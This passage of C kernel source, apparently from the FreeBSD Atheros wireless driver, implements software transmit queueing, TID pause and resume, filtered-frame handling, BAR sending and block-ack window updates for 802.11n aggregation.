} DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: baw is now %d:%d, baw head=%d\n", __func__, tap->txa_start, tap->txa_wnd, tid->baw_head); } static void ath_tx_leak_count_update(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { struct ieee80211_frame *wh; ATH_TX_LOCK_ASSERT(sc); if (tid->an->an_leak_count > 0) { wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * Update MORE based on the software/net80211 queue states. */ if ((tid->an->an_stack_psq > 0) || (tid->an->an_swq_depth > 0)) wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; else wh->i_fc[1] &= ~IEEE80211_FC1_MORE_DATA; DPRINTF(sc, ATH_DEBUG_NODE_PWRSAVE, "%s: %6D: leak count = %d, psq=%d, swq=%d, MORE=%d\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->an->an_leak_count, tid->an->an_stack_psq, tid->an->an_swq_depth, !! (wh->i_fc[1] & IEEE80211_FC1_MORE_DATA)); /* * Re-sync the underlying buffer. */ bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); tid->an->an_leak_count --; } } static int ath_tx_tid_can_tx_or_sched(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); if (tid->an->an_leak_count > 0) { return (1); } if (tid->paused) return (0); return (1); } /* * Mark the current node/TID as ready to TX. * * This is done to make it easy for the software scheduler to * find which nodes have data to send. * * The TXQ lock must be held. */ void ath_tx_tid_sched(struct ath_softc *sc, struct ath_tid *tid) { struct ath_txq *txq = sc->sc_ac2q[tid->ac]; ATH_TX_LOCK_ASSERT(sc); /* * If we are leaking out a frame to this destination * for PS-POLL, ensure that we allow scheduling to * occur. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) return; /* paused, can't schedule yet */ if (tid->sched) return; /* already scheduled */ tid->sched = 1; #if 0 /* * If this is a sleeping node we're leaking to, given * it a higher priority. This is so bad for QoS it hurts. */ if (tid->an->an_leak_count) { TAILQ_INSERT_HEAD(&txq->axq_tidq, tid, axq_qelem); } else { TAILQ_INSERT_TAIL(&txq->axq_tidq, tid, axq_qelem); } #endif /* * We can't do the above - it'll confuse the TXQ software * scheduler which will keep checking the _head_ TID * in the list to see if it has traffic. If we queue * a TID to the head of the list and it doesn't transmit, * we'll check it again. * * So, get the rest of this leaking frames support working * and reliable first and _then_ optimise it so they're * pushed out in front of any other pending software * queued nodes. */ TAILQ_INSERT_TAIL(&txq->axq_tidq, tid, axq_qelem); } /* * Mark the current node as no longer needing to be polled for * TX packets. * * The TXQ lock must be held. */ static void ath_tx_tid_unsched(struct ath_softc *sc, struct ath_tid *tid) { struct ath_txq *txq = sc->sc_ac2q[tid->ac]; ATH_TX_LOCK_ASSERT(sc); if (tid->sched == 0) return; tid->sched = 0; TAILQ_REMOVE(&txq->axq_tidq, tid, axq_qelem); } /* * Assign a sequence number manually to the given frame. * * This should only be called for A-MPDU TX frames. */ static ieee80211_seq ath_tx_tid_seqno_assign(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0) { struct ieee80211_frame *wh; int tid, pri; ieee80211_seq seqno; uint8_t subtype; /* TID lookup */ wh = mtod(m0, struct ieee80211_frame *); pri = M_WME_GETAC(m0); /* honor classification */ tid = WME_AC_TO_TID(pri); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: pri=%d, tid=%d, qos has seq=%d\n", __func__, pri, tid, IEEE80211_QOS_HAS_SEQ(wh)); /* XXX Is it a control frame? Ignore */ /* Does the packet require a sequence number? */ if (! IEEE80211_QOS_HAS_SEQ(wh)) return -1; ATH_TX_LOCK_ASSERT(sc); /* * Is it a QOS NULL Data frame? Give it a sequence number from * the default TID (IEEE80211_NONQOS_TID.) * * The RX path of everything I've looked at doesn't include the NULL * data frame sequence number in the aggregation state updates, so * assigning it a sequence number there will cause a BAW hole on the * RX side. */ subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) { /* XXX no locking for this TID? This is a bit of a problem. */ seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]; INCR(ni->ni_txseqs[IEEE80211_NONQOS_TID], IEEE80211_SEQ_RANGE); } else { /* Manually assign sequence number */ seqno = ni->ni_txseqs[tid]; INCR(ni->ni_txseqs[tid], IEEE80211_SEQ_RANGE); } *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m0, seqno); /* Return so caller can do something with it if needed */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: -> seqno=%d\n", __func__, seqno); return seqno; } /* * Attempt to direct dispatch an aggregate frame to hardware. * If the frame is out of BAW, queue. * Otherwise, schedule it as a single frame. */ static void ath_tx_xmit_aggr(struct ath_softc *sc, struct ath_node *an, struct ath_txq *txq, struct ath_buf *bf) { struct ath_tid *tid = &an->an_tid[bf->bf_state.bfs_tid]; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); /* paused? queue */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) { ATH_TID_INSERT_HEAD(tid, bf, bf_list); /* XXX don't sched - we're paused! */ return; } /* outside baw? queue */ if (bf->bf_state.bfs_dobaw && (! BAW_WITHIN(tap->txa_start, tap->txa_wnd, SEQNO(bf->bf_state.bfs_seqno)))) { ATH_TID_INSERT_HEAD(tid, bf, bf_list); ath_tx_tid_sched(sc, tid); return; } /* * This is a temporary check and should be removed once * all the relevant code paths have been fixed. * * During aggregate retries, it's possible that the head * frame will fail (which has the bfs_aggr and bfs_nframes * fields set for said aggregate) and will be retried as * a single frame. In this instance, the values should * be reset or the completion code will get upset with you. */ if (bf->bf_state.bfs_aggr != 0 || bf->bf_state.bfs_nframes > 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bfs_aggr=%d, bfs_nframes=%d\n", __func__, bf->bf_state.bfs_aggr, bf->bf_state.bfs_nframes); bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; } /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* Direct dispatch to hardware */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* Statistics */ sc->sc_aggr_stats.aggr_low_hwq_single_pkt++; /* Track per-TID hardware queue depth correctly */ tid->hwq_depth++; /* Add to BAW */ if (bf->bf_state.bfs_dobaw) { ath_tx_addto_baw(sc, an, tid, bf); bf->bf_state.bfs_addedbaw = 1; } /* Set completion handler, multi-frame aggregate or not */ bf->bf_comp = ath_tx_aggr_comp; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); /* Hand off to hardware */ ath_tx_handoff(sc, txq, bf); } /* * Attempt to send the packet. * If the queue isn't busy, direct-dispatch. * If the queue is busy enough, queue the given packet on the * relevant software queue. */ void ath_tx_swq(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_txq *txq, int queue_to_head, struct ath_buf *bf) { struct ath_node *an = ATH_NODE(ni); struct ieee80211_frame *wh; struct ath_tid *atid; int pri, tid; struct mbuf *m0 = bf->bf_m; ATH_TX_LOCK_ASSERT(sc); /* Fetch the TID - non-QoS frames get assigned to TID 16 */ wh = mtod(m0, struct ieee80211_frame *); pri = ath_tx_getac(sc, m0); tid = ath_tx_gettid(sc, m0); atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p, pri=%d, tid=%d, qos=%d\n", __func__, bf, pri, tid, IEEE80211_QOS_HAS_SEQ(wh)); /* Set local packet state, used to queue packets to hardware */ /* XXX potentially duplicate info, re-check */ bf->bf_state.bfs_tid = tid; bf->bf_state.bfs_tx_queue = txq->axq_qnum; bf->bf_state.bfs_pri = pri; /* * If the hardware queue isn't busy, queue it directly. * If the hardware queue is busy, queue it. * If the TID is paused or the traffic it outside BAW, software * queue it. * * If the node is in power-save and we're leaking a frame, * leak a single frame. */ if (! ath_tx_tid_can_tx_or_sched(sc, atid)) { /* TID is paused, queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: paused\n", __func__); /* * If the caller requested that it be sent at a high * priority, queue it at the head of the list. */ if (queue_to_head) ATH_TID_INSERT_HEAD(atid, bf, bf_list); else ATH_TID_INSERT_TAIL(atid, bf, bf_list); } else if (ath_tx_ampdu_pending(sc, an, tid)) { /* AMPDU pending; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: pending\n", __func__); ATH_TID_INSERT_TAIL(atid, bf, bf_list); /* XXX sched? */ } else if (ath_tx_ampdu_running(sc, an, tid)) { /* AMPDU running, attempt direct dispatch if possible */ /* * Always queue the frame to the tail of the list. */ ATH_TID_INSERT_TAIL(atid, bf, bf_list); /* * If the hardware queue isn't busy, direct dispatch * the head frame in the list. Don't schedule the * TID - let it build some more frames first? * * When running A-MPDU, always just check the hardware * queue depth against the aggregate frame limit. * We don't want to burst a large number of single frames * out to the hardware; we want to aggressively hold back. * * Otherwise, schedule the TID. */ /* XXX TXQ locking */ if (txq->axq_depth + txq->fifo.axq_depth < sc->sc_hwq_limit_aggr) { bf = ATH_TID_FIRST(atid); ATH_TID_REMOVE(atid, bf, bf_list); /* * Ensure it's definitely treated as a non-AMPDU * frame - this information may have been left * over from a previous attempt. */ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; /* Queue to the hardware */ ath_tx_xmit_aggr(sc, an, txq, bf); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: xmit_aggr\n", __func__); } else { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: ampdu; swq'ing\n", __func__); ath_tx_tid_sched(sc, atid); } /* * If we're not doing A-MPDU, be prepared to direct dispatch * up to both limits if possible. This particular corner * case may end up with packet starvation between aggregate * traffic and non-aggregate traffic: we wnat to ensure * that non-aggregate stations get a few frames queued to the * hardware before the aggregate station(s) get their chance. * * So if you only ever see a couple of frames direct dispatched * to the hardware from a non-AMPDU client, check both here * and in the software queue dispatcher to ensure that those * non-AMPDU stations get a fair chance to transmit. */ /* XXX TXQ locking */ } else if ((txq->axq_depth + txq->fifo.axq_depth < sc->sc_hwq_limit_nonaggr) && (txq->axq_aggr_depth < sc->sc_hwq_limit_aggr)) { /* AMPDU not running, attempt direct dispatch */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: xmit_normal\n", __func__); /* See if clrdmask needs to be set */ ath_tx_update_clrdmask(sc, atid, bf); /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, atid, bf); /* * Dispatch the frame. */ ath_tx_xmit_normal(sc, txq, bf); } else { /* Busy; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: swq'ing\n", __func__); ATH_TID_INSERT_TAIL(atid, bf, bf_list); ath_tx_tid_sched(sc, atid); } } /* * Only set the clrdmask bit if none of the nodes are currently * filtered. * * XXX TODO: go through all the callers and check to see * which are being called in the context of looping over all * TIDs (eg, if all tids are being paused, resumed, etc.) * That'll avoid O(n^2) complexity here. */ static void ath_tx_set_clrdmask(struct ath_softc *sc, struct ath_node *an) { int i; ATH_TX_LOCK_ASSERT(sc); for (i = 0; i < IEEE80211_TID_SIZE; i++) { if (an->an_tid[i].isfiltered == 1) return; } an->clrdmask = 1; } /* * Configure the per-TID node state. * * This likely belongs in if_ath_node.c but I can't think of anywhere * else to put it just yet. * * This sets up the SLISTs and the mutex as appropriate. */ void ath_tx_tid_init(struct ath_softc *sc, struct ath_node *an) { int i, j; struct ath_tid *atid; for (i = 0; i < IEEE80211_TID_SIZE; i++) { atid = &an->an_tid[i]; /* XXX now with this bzer(), is the field 0'ing needed? */ bzero(atid, sizeof(*atid)); TAILQ_INIT(&atid->tid_q); TAILQ_INIT(&atid->filtq.tid_q); atid->tid = i; atid->an = an; for (j = 0; j < ATH_TID_MAX_BUFS; j++) atid->tx_buf[j] = NULL; atid->baw_head = atid->baw_tail = 0; atid->paused = 0; atid->sched = 0; atid->hwq_depth = 0; atid->cleanup_inprogress = 0; if (i == IEEE80211_NONQOS_TID) atid->ac = ATH_NONQOS_TID_AC; else atid->ac = TID_TO_WME_AC(i); } an->clrdmask = 1; /* Always start by setting this bit */ } /* * Pause the current TID. This stops packets from being transmitted * on it. * * Since this is also called from upper layers as well as the driver, * it will get the TID lock. */ static void ath_tx_tid_pause(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); tid->paused++; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: paused = %d\n", __func__, tid->paused); } /* * Unpause the current TID, and schedule it if needed. */ static void ath_tx_tid_resume(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); /* * There's some odd places where ath_tx_tid_resume() is called * when it shouldn't be; this works around that particular issue * until it's actually resolved. */ if (tid->paused == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: paused=0?\n", __func__, tid->an->an_node.ni_macaddr, ":"); } else { tid->paused--; } DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: unpaused = %d\n", __func__, tid->paused); if (tid->paused) return; /* * Override the clrdmask configuration for the next frame * from this TID, just to get the ball rolling. */ ath_tx_set_clrdmask(sc, tid->an); if (tid->axq_depth == 0) return; /* XXX isfiltered shouldn't ever be 0 at this point */ if (tid->isfiltered == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: filtered?!\n", __func__); return; } ath_tx_tid_sched(sc, tid); /* * Queue the software TX scheduler. */ ath_tx_swq_kick(sc); } /* * Add the given ath_buf to the TID filtered frame list. * This requires the TID be filtered. */ static void ath_tx_tid_filt_addbuf(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); if (!tid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: not filtered?!\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p\n", __func__, bf); /* Set the retry bit and bump the retry counter */ ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swfiltered++; ATH_TID_FILT_INSERT_TAIL(tid, bf, bf_list); } /* * Handle a completed filtered frame from the given TID. * This just enables/pauses the filtered frame state if required * and appends the filtered frame to the filtered queue. */ static void ath_tx_tid_filt_comp_buf(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); if (! tid->isfiltered) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: filter transition\n", __func__); tid->isfiltered = 1; ath_tx_tid_pause(sc, tid); } /* Add the frame to the filter queue */ ath_tx_tid_filt_addbuf(sc, tid, bf); } /* * Complete the filtered frame TX completion. * * If there are no more frames in the hardware queue, unpause/unfilter * the TID if applicable. Otherwise we will wait for a node PS transition * to unfilter. */ static void ath_tx_tid_filt_comp_complete(struct ath_softc *sc, struct ath_tid *tid) { struct ath_buf *bf; ATH_TX_LOCK_ASSERT(sc); if (tid->hwq_depth != 0) return; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: hwq=0, transition back\n", __func__); tid->isfiltered = 0; /* XXX ath_tx_tid_resume() also calls ath_tx_set_clrdmask()! */ ath_tx_set_clrdmask(sc, tid->an); /* XXX this is really quite inefficient */ while ((bf = ATH_TID_FILT_LAST(tid, ath_bufhead_s)) != NULL) { ATH_TID_FILT_REMOVE(tid, bf, bf_list); ATH_TID_INSERT_HEAD(tid, bf, bf_list); } ath_tx_tid_resume(sc, tid); } /* * Called when a single (aggregate or otherwise) frame is completed. * * Returns 1 if the buffer could be added to the filtered list * (cloned or otherwise), 0 if the buffer couldn't be added to the * filtered list (failed clone; expired retry) and the caller should * free it and handle it like a failure (eg by sending a BAR.) */ static int ath_tx_tid_filt_comp_single(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { struct ath_buf *nbf; int retval; ATH_TX_LOCK_ASSERT(sc); /* * Don't allow a filtered frame to live forever. */ if (bf->bf_state.bfs_retries > SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p, seqno=%d, exceeded retries\n", __func__, bf, bf->bf_state.bfs_seqno); return (0); } /* * A busy buffer can't be added to the retry list. * It needs to be cloned. */ if (bf->bf_flags & ATH_BUF_BUSY) { nbf = ath_tx_retry_clone(sc, tid->an, tid, bf); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer clone: %p -> %p\n", __func__, bf, nbf); } else { nbf = bf; } if (nbf == NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer couldn't be cloned (%p)!\n", __func__, bf); retval = 1; } else { ath_tx_tid_filt_comp_buf(sc, tid, nbf); retval = 0; } ath_tx_tid_filt_comp_complete(sc, tid); return (retval); } static void ath_tx_tid_filt_comp_aggr(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf_first, ath_bufhead *bf_q) { struct ath_buf *bf, *bf_next, *nbf; ATH_TX_LOCK_ASSERT(sc); bf = bf_first; while (bf) { bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ /* * Don't allow a filtered frame to live forever. */ if (bf->bf_state.bfs_retries > SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p, seqno=%d, exceeded retries\n", __func__, bf, bf->bf_state.bfs_seqno); TAILQ_INSERT_TAIL(bf_q, bf, bf_list); goto next; } if (bf->bf_flags & ATH_BUF_BUSY) { nbf = ath_tx_retry_clone(sc, tid->an, tid, bf); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer cloned: %p -> %p", __func__, bf, nbf); } else { nbf = bf; } /* * If the buffer couldn't be cloned, add it to bf_q; * the caller will free the buffer(s) as required. */ if (nbf == NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: buffer couldn't be cloned! (%p)\n", __func__, bf); TAILQ_INSERT_TAIL(bf_q, bf, bf_list); } else { ath_tx_tid_filt_comp_buf(sc, tid, nbf); } next: bf = bf_next; } ath_tx_tid_filt_comp_complete(sc, tid); } /* * Suspend the queue because we need to TX a BAR. */ static void ath_tx_tid_bar_suspend(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: tid=%d, bar_wait=%d, bar_tx=%d, called\n", __func__, tid->tid, tid->bar_wait, tid->bar_tx); /* We shouldn't be called when bar_tx is 1 */ if (tid->bar_tx) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: bar_tx is 1?!\n", __func__); } /* If we've already been called, just be patient. */ if (tid->bar_wait) return; /* Wait! */ tid->bar_wait = 1; /* Only one pause, no matter how many frames fail */ ath_tx_tid_pause(sc, tid); } /* * We've finished with BAR handling - either we succeeded or * failed. Either way, unsuspend TX. */ static void ath_tx_tid_bar_unsuspend(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, called\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); if (tid->bar_tx == 0 || tid->bar_wait == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar_tx=%d, bar_wait=%d: ?\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->bar_tx, tid->bar_wait); } tid->bar_tx = tid->bar_wait = 0; ath_tx_tid_resume(sc, tid); } /* * Return whether we're ready to TX a BAR frame. * * Requires the TID lock be held. */ static int ath_tx_tid_bar_tx_ready(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); if (tid->bar_wait == 0 || tid->hwq_depth > 0) return (0); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar ready\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); return (1); } /* * Check whether the current TID is ready to have a BAR * TXed and if so, do the TX. * * Since the TID/TXQ lock can't be held during a call to * ieee80211_send_bar(), we have to do the dirty thing of unlocking it, * sending the BAR and locking it again. * * Eventually, the code to send the BAR should be broken out * from this routine so the lock doesn't have to be reacquired * just to be immediately dropped by the caller. */ static void ath_tx_tid_bar_tx(struct ath_softc *sc, struct ath_tid *tid) { struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, called\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); tap = ath_tx_get_tx_tid(tid->an, tid->tid); /* * This is an error condition! */ if (tid->bar_wait == 0 || tid->bar_tx == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar_tx=%d, bar_wait=%d: ?\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->bar_tx, tid->bar_wait); return; } /* Don't do anything if we still have pending frames */ if (tid->hwq_depth > 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, hwq_depth=%d, waiting\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->hwq_depth); return; } /* We're now about to TX */ tid->bar_tx = 1; /* * Override the clrdmask configuration for the next frame, * just to get the ball rolling. */ ath_tx_set_clrdmask(sc, tid->an); /* * Calculate new BAW left edge, now that all frames have either * succeeded or failed. * * XXX verify this is _actually_ the valid value to begin at! */ DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, new BAW left edge=%d\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tap->txa_start); /* Try sending the BAR frame */ /* We can't hold the lock here! */ ATH_TX_UNLOCK(sc); if (ieee80211_send_bar(&tid->an->an_node, tap, tap->txa_start) == 0) { /* Success? Now we wait for notification that it's done */ ATH_TX_LOCK(sc); return; } /* Failure? For now, warn loudly and continue */ ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, failed to TX BAR, continue!\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); ath_tx_tid_bar_unsuspend(sc, tid); } static void ath_tx_tid_drain_pkt(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, ath_bufhead *bf_cq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); /* * If the current TID is running AMPDU, update * the BAW. */ if (ath_tx_ampdu_running(sc, an, tid->tid) && bf->bf_state.bfs_dobaw) { /* * Only remove the frame from the BAW if it's * been transmitted at least once; this means * the frame was in the BAW to begin with. */ if (bf->bf_state.bfs_retries > 0) { ath_tx_update_baw(sc, an, tid, bf); bf->bf_state.bfs_dobaw = 0; } #if 0 /* * This has become a non-fatal error now */ if (! bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); #endif } /* Strip it out of an aggregate list if it was in one */ bf->bf_next = NULL; /* Insert on the free queue to be freed by the caller */ TAILQ_INSERT_TAIL(bf_cq, bf, bf_list); } static void ath_tx_tid_drain_print(struct ath_softc *sc, struct ath_node *an, const char *pfx, struct ath_tid *tid, struct ath_buf *bf) { struct ieee80211_node *ni = &an->an_node; struct ath_txq *txq; struct ieee80211_tx_ampdu *tap; txq = sc->sc_ac2q[tid->ac]; tap = ath_tx_get_tx_tid(an, tid->tid); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: addbaw=%d, dobaw=%d, " "seqno=%d, retry=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, bf->bf_state.bfs_addedbaw, bf->bf_state.bfs_dobaw, SEQNO(bf->bf_state.bfs_seqno), bf->bf_state.bfs_retries); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: txq[%d] axq_depth=%d, axq_aggr_depth=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, txq->axq_qnum, txq->axq_depth, txq->axq_aggr_depth); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: tid txq_depth=%d hwq_depth=%d, bar_wait=%d, " "isfiltered=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, tid->axq_depth, tid->hwq_depth, tid->bar_wait, tid->isfiltered); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: tid %d: " "sched=%d, paused=%d, " "incomp=%d, baw_head=%d, " "baw_tail=%d txa_start=%d, ni_txseqs=%d\n", __func__, pfx, ni->ni_macaddr, ":", tid->tid, tid->sched, tid->paused, tid->incomp, tid->baw_head, tid->baw_tail, tap == NULL ? -1 : tap->txa_start, ni->ni_txseqs[tid->tid]); /* XXX Dump the frame, see what it is? */ ieee80211_dump_pkt(ni->ni_ic, mtod(bf->bf_m, const uint8_t *), bf->bf_m->m_len, 0, -1); } /* * Free any packets currently pending in the software TX queue. * * This will be called when a node is being deleted. * * It can also be called on an active node during an interface * reset or state transition. * * (From Linux/reference): * * TODO: For frame(s) that are in the retry state, we will reuse the * sequence number(s) without setting the retry bit. The * alternative is to give up on these and BAR the receiver's window * forward. */ static void ath_tx_tid_drain(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, ath_bufhead *bf_cq) { struct ath_buf *bf; struct ieee80211_tx_ampdu *tap; struct ieee80211_node *ni = &an->an_node; int t; tap = ath_tx_get_tx_tid(an, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* Walk the queue, free frames */ t = 0; for (;;) { bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } if (t == 0) { ath_tx_tid_drain_print(sc, an, "norm", tid, bf); t = 1; } ATH_TID_REMOVE(tid, bf, bf_list); ath_tx_tid_drain_pkt(sc, an, tid, bf_cq, bf); } /* And now, drain the filtered frame queue */ t = 0; for (;;) { bf = ATH_TID_FILT_FIRST(tid); if (bf == NULL) break; if (t == 0) { ath_tx_tid_drain_print(sc, an, "filt", tid, bf); t = 1; } ATH_TID_FILT_REMOVE(tid, bf, bf_list); ath_tx_tid_drain_pkt(sc, an, tid, bf_cq, bf); } /* * Override the clrdmask configuration for the next frame * in case there is some future transmission, just to get * the ball rolling. * * This won't hurt things if the TID is about to be freed. */ ath_tx_set_clrdmask(sc, tid->an); /* * Now that it's completed, grab the TID lock and update * the sequence number and BAW window. * Because sequence numbers have been assigned to frames * that haven't been sent yet, it's entirely possible * we'll be called with some pending frames that have not * been transmitted. * * The cleaner solution is to do the sequence number allocation * when the packet is first transmitted - and thus the "retries" * check above would be enough to update the BAW/seqno. */ /* But don't do it for non-QoS TIDs */ if (tap) { #if 1 DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: node %p: TID %d: sliding BAW left edge to %d\n", __func__, ni->ni_macaddr, ":", an, tid->tid, tap->txa_start); #endif ni->ni_txseqs[tid->tid] = tap->txa_start; tid->baw_tail = tid->baw_head; } } /* * Reset the TID state. This must be only called once the node has * had its frames flushed from this TID, to ensure that no other * pause / unpause logic can kick in. */ static void ath_tx_tid_reset(struct ath_softc *sc, struct ath_tid *tid) { #if 0 tid->bar_wait = tid->bar_tx = tid->isfiltered = 0; tid->paused = tid->sched = tid->addba_tx_pending = 0; tid->incomp = tid->cleanup_inprogress = 0; #endif /* * If we have a bar_wait set, we need to unpause the TID * here. Otherwise once cleanup has finished, the TID won't * have the right paused counter. * * XXX I'm not going through resume here - I don't want the * node to be rescheuled just yet. This however should be * methodized! */ if (tid->bar_wait) { if (tid->paused > 0) { tid->paused --; } } /* * XXX same with a currently filtered TID. * * Since this is being called during a flush, we assume that * the filtered frame list is actually empty. * * XXX TODO: add in a check to ensure that the filtered queue * depth is actually 0! */ if (tid->isfiltered) { if (tid->paused > 0) { tid->paused --; } } /* * Clear BAR, filtered frames, scheduled and ADDBA pending. * The TID may be going through cleanup from the last association * where things in the BAW are still in the hardware queue. */ tid->bar_wait = 0; tid->bar_tx = 0; tid->isfiltered = 0; tid->sched = 0; tid->addba_tx_pending = 0; /* * XXX TODO: it may just be enough to walk the HWQs and mark * frames for that node as non-aggregate; or mark the ath_node * with something that indicates that aggregation is no longer * occuring. Then we can just toss the BAW complaints and * do a complete hard reset of state here - no pause, no * complete counter, etc. */ } /* * Flush all software queued packets for the given node. * * This occurs when a completion handler frees the last buffer * for a node, and the node is thus freed. This causes the node * to be cleaned up, which ends up calling ath_tx_node_flush. */ void ath_tx_node_flush(struct ath_softc *sc, struct ath_node *an) { int tid; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_KTR(sc, ATH_KTR_NODE, 1, "ath_tx_node_flush: flush node; ni=%p", &an->an_node); ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_NODE, "%s: %6D: flush; is_powersave=%d, stack_psq=%d, tim=%d, " "swq_depth=%d, clrdmask=%d, leak_count=%d\n", __func__, an->an_node.ni_macaddr, ":", an->an_is_powersave, an->an_stack_psq, an->an_tim_set, an->an_swq_depth, an->clrdmask, an->an_leak_count); for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { struct ath_tid *atid = &an->an_tid[tid]; /* Free packets */ ath_tx_tid_drain(sc, 